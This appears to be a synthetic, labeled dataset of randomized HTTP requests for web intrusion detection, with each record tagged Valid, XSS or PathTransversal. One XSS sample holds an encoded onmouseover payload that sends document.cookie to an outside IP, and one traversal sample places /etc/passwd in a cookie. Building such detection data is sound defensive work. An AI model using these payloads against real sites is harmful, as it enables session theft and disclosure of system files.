Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 34150239998
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gqihttpfrom24=betweens&iot:Boroidvcix@ii&iudnderrLfsrui= [rhog

End - Id: 7400
Start - Id: 47370
class: XSS
GET /oozscfeyrmsrEenfb/qYcehG9k4d/iqFIvsnIiWpT-uJOi/7x/ftV/wbodyem2piyBlogD/cIKaw5coK.shtml?mteeohhahottuz=%3Cimg+++src++%3D+++%22+++icme+++++%22onmouseover++++%3D+++%22+++%5Bwindow.open%28%27http%3A%2F%2F20.13.177.51%2Fisro.asp%27%2Bdocument.cookie%29%3B%5D+%22+%3E HTTP/1.1
Host: www.lkAsnnsl.com
Connection: fidrtee
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.1
Accept-Language: iri4-gi;q=0.8, zge-ieil;q=0.5
Cache-Control: max-stale
Client-ip: 61.200.67.223
Cookie: dLDa=ussntmstyleo;33gg@-aOcwYexec=erxgM.xnN;e4irioaAi=012643;rei4=og0eHmieieswp-G;0yeta=S7foNgcie9qyaqmHe
Cookie2: $Version="004"
Date: Sat, 31 Dec 05 02:09:48 CET
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Mon, 20 Oct 08 23:30:14 UTC
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: "0iCazuCaa6P7tlIy"
If-None-Match: "mwW8--AxXoKsq6P"
If-Range: *
Max-Forwards: 7378
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Digest qop=auth-int
Range: 35419-,75138-2674,165640-
Referer: http://r1Lha.st/6rIF/eLenssj/Xjjtel.sh
TE: deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 0.5; hH-me; rv:1.8.3) Gecko/34809408
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: HTTP/7.6 www.ecligt.htm
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 138 242.136.246.70 "dtmun" "Thu, 13 Sep 07 03:49:01 CET"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47370
Start - Id: 17803
class: Valid
GET /saadro0acAntp08oioo/7v@7Wehzkl-ds-AQMyt9/redEaRnbn/yBmK/ceL90zQEo.EshJNq/debggfYpsnn.gif?5w4Ft6valacb726=8694017791&-EZwaWstdinwinntN=0&cHabOSCreplace=dwPxHDqVp&jyLji=u2usi&5Li=p+2otsez&diM9jThh=829&U1jZYhqx=at+oday&8ttto=i5rsoE&kPoltlq2ems=582&EtGcn=flv%27agtt&7q=q2dae7etaaihsnfg8&oacssnerdez=httpp%24&7xIGx=ld5 HTTP/1.1
Host: www.3q3scy.fr
Connection: keep-alive
Accept: audio/x-wav, audio/basic;q=0.4, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: tnot-mwte;q=0.7, htnwdaer-eunsi;q=0.2
Cache-Control: no-store
Client-ip: 163.146.76.142
Cookie: j49Nh=dsro;eanrouscl=aSAn:;ffPn=axCAF8;ns9vg=34
Cookie2: $Version="391"
Date: Sun, 09 Oct 05 05:40:21 CET
ETag: W/"_vPuMsZzKZ_7lToRk9"
Expect: 100-continue
From: e17rsBri@dasrr.ch
If-Modified-Since: Wed, 11 Nov 09 04:38:18 GMT
If-Unmodified-Since: Mon, 04 Sep 06 08:51:00 CET
If-Match: "TUuyQdYpzwja2f_IgjeK"
If-None-Match: "KCdTZ9UG2.7K_@G"
If-Range: "JSck7hKN2qsDK-xW"
Max-Forwards: 2
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM NmVnaWhlaUJpcE5zTmVvb3R1bW4yc2NBcjRlRXFFckVvTmhvbG4=
Authorization: NTLM ZXRlZGxtdGxlYWZ3ZXhsdWhqdGVTODhmdHRnZWF5YWVrZWxkOUxycm50Z3lRb2c=
Range: -542,05-69330,03-679
Referer: http://niIg.be/dfopE/ttlfs.mspx
TE: deflate;q=0.9
Trailer: Pragma
User-Agent: Syttivqytrtnpo
UA-CPU: StrongARM
UA-Disp: 4032,6122,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 942x1602
Via: 9.8 109.254.23.0:791, 7.1 www.xhMs.tiff, 2.6 132.143.157.27
Transfer-Encoding: identity
Upgrade: 2iphci/0.2
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 74706
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17803
Start - Id: 15313
class: Valid
GET /xB.fmbNiform-DmS/LTwZm.7N/ahavbohaoDa02/ehd1IennsoOec/d2faelYs.V1.aspx?lQN9=368567&oadour3oeavr=5&s2sohun=75212&eiur8oh=6033408517&iHFwindow.openbTV9T=f+&ZfDIYKkservicesC=tnw&unionidrop.stmppasswdfrom=nrhhV&diell=758432681&nidhs=cRn&PNH83NX=8628&l0ErdnNntmptt=Eeerxvhlesai&EGpsD13Pexecj8=sIu&Hfv3dZvLnvbscriptc=tdmailog%3Fdt3tmpu&rItnnfhufDcbnds=+ohrf+rgp&ts=790099 HTTP/1.0
Host: www.shia.cz:963
Connection: s7lurl
Accept: */*
Accept-Charset: iso-8859-2;q=0.9, iso-8859-2, utf-7;q=0.8, iso-8859-6, x-mac-roman
Accept-Encoding: 
Accept-Language: lar8Ngl-semivea
Cache-Control: only-if-cached
Client-ip: 3.183.249.21
Cookie: we=67;44ai67s=510;etbHasa9yl=tHgSs3a
Cookie2: $Version="28"
Date: Sun, 02 Apr 06 24:49:59 GMT
ETag: W/"wC8rBWuKAC-CzWi"
Expect: h3o1=tornearr;u7u5=u3eAi
From: sbR2u@rgtt.st
If-Modified-Since: Mon, 31 Oct 05 06:52:01 CET
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: "BmMAppj3Vs0@PeI"
If-None-Match: "J.5gWwHBfS_PQzZi"
If-Range: *
Max-Forwards: 473
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: a3ashh fyuhrze=uoTtep0T
Authorization: Digest uri=http://www.esRaehr.de/awnms.php
Range: 604-0,1-54,-12
Referer: http://www.t1ItpTQ.ch/iieh/efuEoO.msf
TE: gzip,trailers
Trailer: Expect
User-Agent: d8xi7asut (eVf7VZ35)
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9424x098
Via: FTP/4.5 www.a3tuo.css, FTP/0.1 www.dydlto0I.png
Transfer-Encoding: deflate
Upgrade: 3ru/9.4
Warning: 649 149.116.106.106 "Fb6sieGmla8" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15313
Start - Id: 18977
class: Valid
GET /mp9adsb2eexio/rtnRerAtlHt/ca2GBf6pHjlnJo/R6b/2mo6/lUnVL23E8Gp4Y16bEWP/uujir/idMa3qaNoTWuVGZi/efvOC/eofyreelstlom8deso/syDerDyG1KcKh4tFnc@.asp?49tnph-duzq=cVI&uamrcse=05f&tssueanlswo=n+o%3Bn&h9=16331&eeiwuuEqirfSfh=sRV&t0gN8iPnbrioxn=oEatr&jnvbscriptshutdownys=pincludetj&binautoexecwK4SwMiYTm=xiT8ZOOvhK&nanelo=eUdt7fHdU HTTP/1.0
Host: 20.238.120.15
Connection: ttas
Accept: audio/x-wav;q=0.2, application/x-tar
Accept-Charset: euc-kr, windows-874, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: e=o
Client-ip: 193.71.188.123
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="5"
Date: Sun, 17 Jul 05 19:32:33 GMT
ETag: "1LxG-41DxiNy9.n8Y-m"
Expect: snhsa=sroukt;UaSeee
From: l14gyjst@isddra.be
If-Modified-Since: Thu, 25 Jun 09 05:47:47 UTC
If-Unmodified-Since: Sun, 18 Jun 06 10:20:05 GMT
If-Match: *
If-None-Match: "d6XovZ-kIuxfw_Aihi"
If-Range: Thu, 26 Jul 07 07:03:43 GMT
Max-Forwards: 477
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: NTLM OWVhMHp0Z2Nhc3N0b291aGV0SUNub2Rkem9obnJpbjkxeGwxZWJkaW5oZGE=
Range: 63-4,19-3,96935-
Referer: /om9hiooo/i2Aet7/al9e5ro/teof.png
TE: gzip;q=0.9,trailers,chunked;q=0.0
Trailer: Accept-Encoding
User-Agent: rgeC (ayeUWG; hMndtS; t@OZ44uz; r2vSVYy0-)
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 378x534
Via: HTTP/2.5 www.binc.png:340
Transfer-Encoding: compress
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18977
Start - Id: 10795
class: Valid
GET /W8Q7rb_/tncNc4lkuicLwlnm0r/YnAitr3QyEi/gkD4wXDxriMOG/tiabdaa5tooOeeqi.html?aCue0w=2&0oWBT84=q8h&-JU3ggMX=s3fb0TCluMjn&nnbdLuipiohaH=San&aep=ey&a6buasna6d=1280051&idn8ien5gclla4=ytqjeDF&ubinYOR=secf2ozheeh2ez&HanTgoimpeerdub=acli+rgj+pcew%248Nta HTTP/1.1
Host: www.ebof2aw.de:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6478
Client-ip: 97.199.129.81
Cookie: DWae=4O@Sl;L0YIsZtdX5=omb;rpt8d=87407
Cookie2: $Version="9"
Date: Mon, 07 Dec 09 08:17:18 GMT
ETag: "fNmsx9usxqQx6nMj2L4"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Tue, 23 May 06 16:41:22 CET
If-Unmodified-Since: Thu, 28 Jan 10 10:17:41 UTC
If-Match: *
If-None-Match: ".3eLlFo2BvDD3zJRc"
If-Range: "5pX0riV0i.EErHO_pwkX"
Max-Forwards: 74
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YTdqamR6cmFueXkwY29nYWpuN2ViaTVob3JybmRnYWFh
Authorization: NTLM dXBlaHJ0bWN2VGxlSG45cGVjZXRzQWl1dHNpNHR1N3F0ZmFoU2lpOWVpNA==
Range: 2-
Referer: http://www.rrai.it/lhMrS/oopdxNaa/t0tag/ri5hog8/llnseTo.jsp
TE: trailers
Trailer: Warning
User-Agent: Mozilla/1.7 (X11; U; SunOS sun4u 3.3; i5-xm; rv:8.2.2) Gecko/71662163
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6046x3578
Via: 4.3 239.58.136.67
Transfer-Encoding: deflate
Upgrade: dec/3.8
Warning: 774 www.dijag.css "sedtyunrietbnTe" "Sun, 26 Feb 06 01:26:33 CET"
X-Forwarded-For: 228.129.199.161
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10795
Start - Id: 33343
class: Valid
PUT /fetrontt/2EcYQy6e5/efR.cautoexechE_sqOD-/oc_ae5QGCN8@mA-z@.tiff? HTTP/1.0
Content-Length: 60
Content-Language: lek,oVsRs,ei0hrb
Content-Encoding: gzip
Content-Location: /stmeuu/zsbCl0/as4h/cuza.js
Content-MD5: ZWJveTY1N2VyOGUxaXNyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 12:39:04 UTC
Last-Modified: Sat, 15 Dec 07 19:04:07 GMT
Host: 252.194.185.179
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: koi8, iso-8859-4;q=0.7, iso-8859-8-i, x-mac-roman;q=0.0, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: lf-Q;q=0.5, mn-lds7st, huc5eadt-ldag0, o-iDhh, Ysha7ush-5sta3;q=0.1
Cache-Control: max-stale=40195
Client-ip: 219.255.155.213
Cookie: s70thb9Hioreiim=oyseyeuiy;eoonanir5eaogh=tyTl 
Cookie2: $Version="144"
Date: Sat, 21 Apr 07 13:46:18 CET
ETag: "00_rMhSvhU_enOA"
Expect: ybyru8n
From: gn93As@dhNYgeNDu.be
If-Modified-Since: Tue, 17 Feb 09 13:48:27 GMT
If-Unmodified-Since: Fri, 09 Apr 10 17:57:51 GMT
If-Match: *
If-None-Match: "zYCWjbB4uzGNTVY"
If-Range: Sat, 03 Oct 09 11:00:50 CET
Max-Forwards: 8
MIME-Version: 5.3
Pragma: tee2awl='socveBe'
Proxy-Authorization: euet eprhhwtr=g2dt
Authorization: NTLM bnFpMGhkaWJlbUhldW9lbkFMaW1nMHNzYTdxdDlnZnRydHV6aGFy
Range: 1-49146,702-2640,-680433
Referer: /beeJ/2ltns7tu/p0gzom/mVeT45.doc
TE: gzip,chunked,chunked
Trailer: Accept-Encoding
User-Agent: rjtihc/8.6.4.4
UA-CPU: MIPS
UA-Disp: 8652,975,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 7.2 www.bPhaktnc.shtml, 9.0 www.cdTz.js, 0.9 39.194.115.206
Transfer-Encoding: deflate
Upgrade: 6stde/0.3, ewtMfk/8.5, rt9eT5/1.5, nSTo/9.3
Warning: 231 205.9.41.94:7104 "5bslathe9ce" "Sat, 19 May 07 07:06:34 CET"
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 93235551323019151899
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2Hekmocha52xX3= oarCt$&7n=t2sdtHir0pnhi &l0sht=dy6G.f@mB

End - Id: 33343
Start - Id: 3218
class: Valid
GET /variBT/ThttpsDOX1sYIt/w4s/f-J_X2CO/1Shcwly3Zo.png?EteDya9pttsa=21&jai=wrterTnla2rnseueWe&savaaeyuL1=ts6eau5iiEilis&of6Eoctlr8ynd=2836&ri0MLaiwdea5a=iH57W&2iei=5&isi9=7&t82=brbickoestylede%27c%7Cibimgxea&Oec=tadicnewYttrean&aaiDl=l%7C+aeso%3BLsecopyenullNshutdown5&es9usooggrie=9180392281&mshStaedr1p1d=t1SESu2&wt3nyDiooe=%3Chiesnc&enb=78&tn05ieo3es6=umeta+%7C HTTP/1.0
Host: www.SheOuciadT.ch
Connection: nod61r2l
Accept: audio/*, image/*;q=0.6, text/xml;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.2, deflate;q=0.2, gzip;q=0.6, compress
Accept-Language: Ge-iR, tnval-riKq, aceh1A-mue;q=0.4, unietmdw-HkvsaN
Cache-Control: min-fresh=3
Client-ip: 204.70.113.116
Cookie: 8YRsock_streamW_lDR95Y=ekRnesPyi?eval>Tlh
Cookie2: $Version="79"
Date: Sun, 11 Jul 04 23:25:12 CET
ETag: "4cEYoUmf_Sb4ohTmTTa"
Expect: 100-continue
From: gtaowcs@coac.st
If-Modified-Since: Thu, 24 Feb 05 16:05:20 GMT
If-Unmodified-Since: Fri, 30 Apr 04 02:16:42 CET
If-Match: *
If-None-Match: "HYGIs3IYFAjUpAvbM-"
If-Range: Mon, 27 Nov 06 14:03:30 CET
Max-Forwards: 0364
MIME-Version: 3.1
Pragma: t8wm=os
Proxy-Authorization: NTLM amlhbnBCSGc3YWFuQWVlYUhlYW82aHV0dTQyY2ZvcmhFZWVkaA==
Authorization: Digest nc=0eD445d9
Range: -1
Referer: /lsdem9/d1d6ideg.avi
TE: chunked,trailers,gzip
Trailer: TE
User-Agent: hrua/3.6.4
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x7403
Via: FTP/5.0 www.1atgrNp.shtml, 8.9 250.45.86.95
Transfer-Encoding: identity
Upgrade: ircioc/5.5, hzedyy/5.6, wArsli/6.7, Euo/8.2
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3218
Start - Id: 13906
class: Valid
GET /rIMnmLzRLQgC2rHI@GOP/ctttdnnasLrIYaxtsEu/iioo/gIf_dKn/eXqpf9pznr/iptQJ-/5roa1t/mymPYdOLwkOJ4HSb/lFEn59owutY/oVeLVZ-z8NeG/eiBmqFe/wX.sh?yelo3iE=laatibaci8darho&ptdehuaeaitet=tn&8c2us1apEi1=asrsock_streamd%3Ai%3CsaehhkagIhP&Fv-nc3O-=sebdivb&dmaEemUtbcwM=so%40gJsS3U&e28llsdes=%24%26am&HmNfRhs=91459792&agiEieh=libO&4RTteualyeD=eTp2Ou5soeez&ix88aA=hninsertls&bigniitiOsjc=libdhhteZt&extmDpH=e&nLgke5eecsde=2&ofsltrdoC=2632 HTTP/1.0
Host: www.ilibrRygt.cz
Connection: nnEeew
Accept: */*
Accept-Charset: x-mac-arabic;q=0.7, windows-1252, koi8, us-ascii;q=0.7, iso-8859-5;q=0.0
Accept-Encoding: 
Accept-Language: 4Qstnf-rI, ndglct-el, at-Aitt;q=0.9, eeeue1-tenr;q=0.0, ajmr-hrhf8;q=0.0
Cache-Control: 4='cR'
Client-ip: 126.138.205.217
Cookie: pdte3d7nym=sn5oz10ea
Cookie2: $Version="18"
Date: Wed, 22 Jul 09 24:09:49 CET
ETag: "oG6eP1SKqWL4@3kov_"
Expect: adae=gec4itU
From: mshmtny@eieiosii.fr
If-Modified-Since: Thu, 20 Jul 06 22:22:10 UTC
If-Unmodified-Since: Sat, 20 Jan 07 03:48:44 CET
If-Match: "Kq0CnRPjb5-Njw3nNUHM"
If-None-Match: *
If-Range: *
Max-Forwards: 96
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="oa1hT"
Authorization: Digest uri=/xe2qole/rnise/rkein/dserlnl.jpg
Range: 868-9,0-
Referer: /ieeritn/qoel/e9lg/ia7we.mpeg
TE: deflate
Trailer: Transfer-Encoding
User-Agent: gpiXoX http://www.rnse.biz
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7739x7906
Via: 9.8 www.oek6d.tiff:8471, 0.3 www.vgw8fRNl.html, 9.6 www.du7ooht.jpeg
Transfer-Encoding: gzip
Upgrade: fen/1.4, nTejti/5.2, s4r6n/6.9
Warning: 813 152.30.192.175 "oqazlfoqQirrrtqe" "Mon, 31 Oct 05 07:13:42 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13906
Start - Id: 33265
class: Valid
PUT /nttwsiuhyew/h4c/5J1B_K9fG2ldUPGRid/oITCY@FW3gHfSb/jhttpMvD-Txp_0h/O8like1PwXBuT4.e/hfTtearliyswtncw.dll? HTTP/1.1
Content-Length: 171
Content-Language: e,nRu
Content-Encoding: gzip
Content-Location: /mawitm/u3syUIeo/geeiFhd.zip
Content-MD5: YmQ5ZWVuZTducm50dHV0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Apr 10 12:28:23 GMT
Last-Modified: Sun, 15 Aug 04 03:53:57 GMT
Host: www.hhyte4.be
Connection: IanZc
Accept: */*
Accept-Charset: cp-950;q=0.7, koi8-r;q=0.4, isiri-3342, windows-1255;q=0.4
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 17.231.141.238
Cookie: 1v9he1wpr5i=xt1Rveyrst;HeaoNEnis=406;YUm_=nH6arsaesbadon;e66meznw=innia9w
Cookie2: $Version="35"
Date: Mon, 11 Jan 10 22:18:14 CET
ETag: W/"vj8wTgBR@25qmjKFMti"
Expect: hou2r
From: fhleens@leny2Irsni.it
If-Modified-Since: Thu, 28 Jul 05 17:42:31 GMT
If-Unmodified-Since: Thu, 09 Oct 08 14:48:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM c1BoWW1uMmxyZWx0Y2lvYXJvZWhJeHBqMGNpZ2U2ZmFvc2VMYndo
Authorization: NTLM N3NhM0RyYW5lNDNpbW0xcmN0aGRUbzhwcnRvc28wYXQwbjI=
Range: 659776-,87434-,7-715
Referer: http://www.Tjevmdkb.com/vhki5/owNveI8/ne1N/ilazess.swf
TE: trailers,deflate;q=0.5
Trailer: Pragma
User-Agent: Mozilla/2.5 (Windows; U; Win98 0.5; aH-nh; rv:5.7.9) Gecko/18762707
UA-CPU: x86
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8624x050
Via: arS/3.8 47.245.83.192
Transfer-Encoding: gzip
Upgrade: 2o8/7.5, tlkaU/8.1, cSo5ei/1.7, nnttqr/9.4
Warning: 551 21.162.127.115 "nsjirfogneooziabr" "Thu, 08 Jan 04 20:08:26 UTC"
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 09187614917730
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

oi=16&nAacAnaejb=iwrt&pnB2=s~w>[yotDhi&1iIMpasswd=5612&ZvmVrw5oeheer=irbdjf0&heyPinon=520&eeikxghLzf5=72633372&OSYHXNWd7EV=1san&tymq2anerilSeva=1&24HFPoSND=158941719

End - Id: 33265
Start - Id: 1016
class: Valid
GET /n-ACDep66aE/ta40ay/ruo0m2he/q5yrAnteteI9T/ozcbQ.O/hI5dFv7lh0u/mbQ513zZ3.cgi?9imehh7L=73 HTTP/1.0
Host: 77.146.166.10
Connection: keep-alive
Accept: video/mpeg;q=0.0, application/*;q=0.1, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.4, identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 113.11.66.85
Cookie: geynaiYsdmss=tntjpeqoortzesghe;s3e=74279992;aee=nN5
Cookie2: $Version="47"
Date: Thu, 12 Nov 09 03:04:27 UTC
ETag: "guQP-vgLmi_nEuJ8"
Expect: ASw4
From: iyiqd@OJte.cz
If-Modified-Since: Sat, 11 Feb 06 04:30:24 GMT
If-Unmodified-Since: Sat, 08 Jan 05 20:43:30 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 20 May 08 12:22:09 CET
Max-Forwards: 52
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 9-72361,672405-
Referer: http://roowjnEo.ch/rts8/4tth5Ns.gz
TE: trailers
Trailer: If-Match
User-Agent: sDvB@dzEXH http://www.sedl.de
UA-CPU: x86
UA-Disp: 419,762,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 9.7 www.7sEslgr.jpeg:4, 0.5 www.bfljhe7y.gif, FTP/6.2 123.121.14.98
Transfer-Encoding: isre
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 626 www.sIhu.js:02385 "3Foepetu3EnniiehE" "Sun, 13 Feb 05 14:48:31 UTC"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1016
Start - Id: 25431
class: Valid
GET /elwnihaatepeLrpm/jpvyGhD4cpWz4MOaA/vsowoyrbiUr2bubaa8/AP%uuuAZX9/Bhhta/iCn-KTYpEIBD.viZX/tq.bin?saK=ba6eD4dtrtcego6ey&FH-1.FL=041&dyelxu=ite HTTP/1.1
Host: www.rtml.it
Connection: doxsv
Accept: application/postscript, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: p=sqhuS
Client-ip: 82.74.210.10
Cookie: ontl2rn=~;7ahorfuyeeEsw0o=xtermginput&<;s4tmiana98Leg9=oaautoexecaroreplace Hr=Ee3eboot.inid $;nccteepeioea=M] childfil4tj$services;dRele0=2d;yx= T
Cookie2: $Version="634"
Date: Mon, 24 Jul 06 20:39:36 CET
ETag: W/"3mRfOB8JKF_XbSkIwX70"
Expect: keo3Em
From: ledpneia@lcpqUt.de
If-Modified-Since: Mon, 15 Oct 07 22:05:27 GMT
If-Unmodified-Since: Sun, 21 Mar 10 21:07:19 UTC
If-Match: "jiShs_gZ8WWZBjv9"
If-None-Match: "exzZSAypmtQ@2P@PG8be"
If-Range: Wed, 18 Jul 07 03:57:13 GMT
Max-Forwards: 22
MIME-Version: 9.1
Pragma: Tl4myma8='qbs3'
Proxy-Authorization: NTLM UmVsb2ZyemNJd2VncmFhd2k1QTVPc2hiY25ycmVzS2h1YWFTdGVlbWlr
Authorization: NTLM aU5SbWU1dHp0c2xsRWllbndubXMwa2h0Q2NlZWFuNnNHMjlmaWVwYWFxc3Q=
Range: 792212-0
Referer: /ity6lo4/l7haNh/hnanr/annq/uw7Iurot.gz
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 3.2; sn-qj; rv:3.8.3) Gecko/50792376
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 1.6 www.9aoeeos.css, 2.8 www.e95um9L.gif
Transfer-Encoding: deflate
Upgrade: roti/6.6, neeqsd/9.8, ycfke/5.8, l52ps/7.9, Ahg/7.6
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25431
Start - Id: 36380
class: PathTransversal
PUT /eqgb/bp/sXqNttZVdIgJ4Lcd2q0q/_Bv2TXQPvnf/Na.php4? HTTP/1.1
Content-Length: 26
Content-Language: sntino,enedTa
Content-Encoding: deflate
Content-Location: http://www.dl52q.com/hnEz/auelm.msf
Content-MD5: OG5yZWF0cnBscHlRMHN6eg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Aug 04 21:09:36 GMT
Last-Modified: Thu, 12 May 05 01:22:54 GMT
Host: www.UIul8zkit.com
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: 9AnTAD-rTe;q=0.3
Cache-Control: min-fresh=6
Cookie: nnoded67KSMHy=/etc/passwd
Cookie2: $Version="754"
Date: Sat, 10 Dec 05 15:41:01 CET
ETag: W/"lbia_zG.XqFaHoQ"
Expect: iYoaa
If-Modified-Since: Sat, 16 Oct 04 17:13:54 UTC
If-Unmodified-Since: Sat, 28 Jun 08 20:23:08 GMT
Max-Forwards: 9562
Referer: http://eesoenn.net/ohfh/uen1eetr.bin
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 6.8; us-ea; rv:4.8.0) Gecko/75791530
Upgrade: 0orneh/2.5, y0orgs/7.1, nlhnEl/7.7, tlh/9.5, it3aid/7.7
X-Forwarded-For: 241.118.214.73

0thaeuyt1=caccess_logrsnRd

End - Id: 36380
Start - Id: 13383
class: Valid
GET /lwe/fojheelaRrOcmnou.png? HTTP/1.0
Host: 191.131.249.155
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: saehm-bpsef;q=0.8, if1cisN-7qgs;q=0.1, im-gagot4;q=0.6, eea-wai;q=0.3
Cache-Control: min-fresh=37
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Sat, 30 Jul 05 20:59:39 UTC
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: nsnth
From: tR8tllhl@cnlly.de
If-Modified-Since: Sun, 17 Jan 10 03:18:42 CET
If-Unmodified-Since: Fri, 26 Sep 08 21:44:42 UTC
If-Match: *
If-None-Match: "ycqV6hXmDm38qj1"
If-Range: Thu, 02 Apr 09 07:02:54 GMT
Max-Forwards: 035
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: 30-,-79267,97-361160
Referer: http://www.uheesAee.be/ci6loolj/cVOrd/xjeimar2.gif
TE: chunked,gzip;q=0.2
Trailer: Warning
User-Agent: snoey8gdoOrOFe3auoM
UA-CPU: x86
